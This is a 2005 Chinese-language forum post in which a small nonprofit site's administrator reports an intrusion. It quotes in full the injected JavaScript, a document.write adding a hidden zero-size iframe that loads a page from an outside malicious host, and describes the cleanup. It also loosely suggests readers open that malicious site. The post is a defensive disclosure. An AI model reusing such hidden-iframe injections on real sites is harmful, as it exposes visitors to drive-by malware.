hwg 荣誉:管理员 等级:业余侠客 经验:540 帖子:388 注册:2004/3/31 状态:离线 |
| 档案 搜索 邮件 短信 引用 编辑 删除 屏蔽/恢复 |
第11楼 |
"病毒"问题经过一天努力,逐页排查,终于抓住了黑客的狐狸尾巴.原来黑客在主页上控制WMP播放的一个EM.JS相关文件上作了手脚,写入了document.write("<iframe src=\"http://mylover123456.go3.icpcn.com/images/face/web.htm\" name=\"zhu\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>");这样一段代码,前半部分网址就是诺顿提示的"发现威胁",这是一个叫"鑫新网吧"的电影点播网站,似还没有ICP注册,我已发邮件向其提出质询和井告,并准备在没有满意答复时进行投诉(有兴趣可以打开试试,不过一定要先卸掉其它杀毒软件改装好诺顿,瑞星和金山现在还不行,我已向瑞星提供病毒样本并等待他们的意见).这个代码是在9.10夜间3点写入的,包括在10日-11日进入过本站但还没有诺顿的朋友,如果需要,请到这里下载一个诺顿9.0企业版很好用,还可以自动升级.现在病毒已完全清除了,网站已恢复正常运行.在重庆主机的配合下,又采取了新的防范措施,但愿今后不再发生此类问题.像我们这样小小的公益性网站,也招来黑客侵范,可见当前网上之"黑"了,希望大家共防共勉之.也利用这个机会,感谢诸位网友的及时提示和关心,没有你们的提示,这瑞星不知道何时才有反应,(当然,诺顿也不是万能的,网上对诺顿也常见微词,因此众多使用不同杀毒软件的网友的关心是十分必要的)对在此间曾来网站访问的网友带来的影响表示歉意,并请您们采取相应的查杀措施以免除后果.
[此贴子已经被 hwg 于2005-9-12 8:35:46编辑过] |
-------------------------------------------
|
2005/9/11 21:50:22 |
|
论坛短信(0 新)
